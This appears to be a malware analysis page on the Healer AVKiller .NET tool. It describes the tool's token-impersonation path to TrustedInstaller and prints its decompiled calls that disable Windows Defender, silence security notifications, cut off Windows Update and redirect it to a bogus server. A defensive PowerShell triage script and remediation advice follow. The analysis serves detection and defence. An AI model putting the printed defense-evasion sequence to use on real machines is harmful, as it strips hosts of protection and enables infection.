Healer AVKiller
Simple .NET hack tool used to kill AV
Overview
This small .NET hacking tool is often deployed alongside RedLine Stealer and is used to disable Windows Defender (and, as the decompiled targets below show, Windows Update) on the victim host.
Samples
- 976ba54ff3f8ab4c1d6fe5629460b1fc42106495ddb3151b52951030069b6d47 UnpacMe Analysis
- 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38 UnpacMe Analysis
- a4f91172441b827b1e0cc6d7fb58d904fb5dd3bca64f08be24c431db2fdcca6d UnpacMe Analysis
Analysis
When launched, the binary first elevates to SYSTEM by impersonating the token of winlogon.exe, then migrates to TrustedInstaller by impersonating the token of the TrustedInstaller service. With TrustedInstaller permissions it gains full access to protected registry keys and services, including those used by Windows Defender. This is a well-documented elevation tactic, described in the 2017 blog post The Art of Becoming TrustedInstaller. Note that opening and impersonating the winlogon token requires an already-elevated (administrator) context, so this is an admin-to-SYSTEM-to-TrustedInstaller chain rather than a privilege-escalation exploit; the tool depends on the dropper already running with high integrity.
Windows Defender Targets
The following services are stopped and disabled and the following registry values are set. RegistryEdit and DisableService are the tool's own helper methods, and the registry paths are relative (presumably under HKLM, which is where the Defender and Windows Update policy keys live). The second half of the list goes beyond Defender: it disables the Windows Update services and points the update client at a non-existent WSUS server ("server.wsus"), presumably so that updates cannot restore or refresh the protection that was just switched off.
// Windows Defender: stop the engine service, then set the policy values that
// keep it off even if the service is restarted.
Program.DisableService("WinDefend");
Program.RegistryEdit("SOFTWARE\\Microsoft\\Windows Defender\\Features", "TamperProtection", "0");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableIOAVProtection", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableRealtimeMonitoring", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
// Suppress the Security Center notifications that would alert the user.
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\Notifications", "DisableNotifications", "1");
// Windows Update: disable the update, medic and orchestrator services ...
Program.DisableService("wuauserv");
Program.DisableService("WaaSMedicSvc");
Program.DisableService("UsoSvc");
// ... turn off automatic updates by policy ...
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AUOptions", "2");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AutoInstallMinorUpdates", "0");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "NoAutoUpdate", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "NoAutoRebootWithLoggedOnUsers", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "UseWUServer", "1");
// ... and redirect the client to a bogus WSUS host so it never reaches Microsoft.
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "DoNotConnectToWindowsUpdateInternetLocations", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUStatusServer", "server.wsus");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUServer", "server.wsus");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "UpdateServiceUrlAlternate", "server.wsus");
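The targets above double as a host triage checklist. The following PowerShell audit is an added example written for this page; it is not code from the Healer sample or from the original analysis. It assumes the RegistryEdit paths are relative to HKLM, that the host runs Windows 10/11 with PowerShell 5.1 or later, and that it is run from an elevated prompt. The function name Get-HealerTamperingFindings is an invented one.

```powershell
# Added triage script (not part of the Healer sample). Assumptions: the
# sample's registry paths are relative to HKLM, PowerShell 5.1+, elevated shell.

function Get-HealerTamperingFindings {
    # Each entry is a value the sample writes and the data it writes ("Bad").
    # Values are compared as strings so that a REG_DWORD 1 and a REG_SZ "1"
    # both match (the decompiled code does not show which type RegistryEdit uses).
    $rtp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'
    $au  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU'
    $wu  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    $registryIndicators = @(
        @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features'; Name = 'TamperProtection'; Bad = '0' }
        @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'; Name = 'DisableAntiSpyware'; Bad = '1' }
        @{ Key = $rtp; Name = 'DisableBehaviorMonitoring';   Bad = '1' }
        @{ Key = $rtp; Name = 'DisableIOAVProtection';       Bad = '1' }
        @{ Key = $rtp; Name = 'DisableOnAccessProtection';   Bad = '1' }
        @{ Key = $rtp; Name = 'DisableRealtimeMonitoring';   Bad = '1' }
        @{ Key = $rtp; Name = 'DisableScanOnRealtimeEnable'; Bad = '1' }
        @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications'; Name = 'DisableNotifications'; Bad = '1' }
        @{ Key = $au;  Name = 'AUOptions';                     Bad = '2' }
        @{ Key = $au;  Name = 'AutoInstallMinorUpdates';       Bad = '0' }
        @{ Key = $au;  Name = 'NoAutoUpdate';                  Bad = '1' }
        @{ Key = $au;  Name = 'NoAutoRebootWithLoggedOnUsers'; Bad = '1' }
        @{ Key = $au;  Name = 'UseWUServer';                   Bad = '1' }
        @{ Key = $wu;  Name = 'DoNotConnectToWindowsUpdateInternetLocations'; Bad = '1' }
        # Only the sample's literal hostname is flagged: a real WSUS hostname
        # here is normal in a managed environment and is not an indicator.
        @{ Key = $wu;  Name = 'WUStatusServer';           Bad = 'server.wsus' }
        @{ Key = $wu;  Name = 'WUServer';                 Bad = 'server.wsus' }
        @{ Key = $wu;  Name = 'UpdateServiceUrlAlternate'; Bad = 'server.wsus' }
    )

    $findings = @()

    foreach ($i in $registryIndicators) {
        # -Name on a missing value is a non-terminating error; suppress it and
        # treat a $null result as "value not present".
        $item = Get-ItemProperty -Path $i.Key -Name $i.Name -ErrorAction SilentlyContinue
        if ($null -eq $item) { continue }
        $current = [string]$item.($i.Name)
        if ($current -eq $i.Bad) {
            $findings += [pscustomobject]@{ Type = 'Registry'; Target = "$($i.Key)\$($i.Name)"; Value = $current }
        }
    }

    # wuauserv and UsoSvc are demand-start and frequently stopped on a healthy
    # host, so only a Disabled start type is a reliable indicator for them.
    # WinDefend should be running whenever Defender is the active AV.
    foreach ($name in 'WinDefend', 'wuauserv', 'WaaSMedicSvc', 'UsoSvc') {
        $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
        if ($null -eq $svc) { continue }
        $disabled = $svc.StartType -eq 'Disabled'
        $defenderStopped = ($name -eq 'WinDefend') -and ($svc.Status -ne 'Running')
        if ($disabled -or $defenderStopped) {
            $findings += [pscustomobject]@{ Type = 'Service'; Target = $name; Value = "$($svc.StartType)/$($svc.Status)" }
        }
    }

    # Cross-check with the Defender engine's own view, where the module is present.
    $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if ($null -ne $mp) {
        if (-not $mp.IsTamperProtected) {
            $findings += [pscustomobject]@{ Type = 'Defender'; Target = 'IsTamperProtected'; Value = 'False' }
        }
        if (-not $mp.RealTimeProtectionEnabled) {
            $findings += [pscustomobject]@{ Type = 'Defender'; Target = 'RealTimeProtectionEnabled'; Value = 'False' }
        }
    }

    return $findings
}

$results = Get-HealerTamperingFindings
if ($results.Count -eq 0) {
    Write-Host 'No Healer-style Defender/Windows Update tampering found.'
} else {
    $results | Format-Table -AutoSize
}
```

Because the sample writes policy values rather than the live configuration, remediation is mostly removing those values (Remove-ItemProperty on the Policies keys) and re-enabling the four services with Set-Service -StartupType; the TamperProtection value under Windows Defender\Features should be restored through the Windows Security app or MDE rather than by hand. Treat a hit on the Windows Update rows as corroboration rather than proof on its own: NoAutoUpdate and a WSUS redirect also appear in legitimate GPO-managed builds, and it is the combination with the Defender rows, the disabled WaaSMedicSvc, and the literal "server.wsus" hostname that matches this tool.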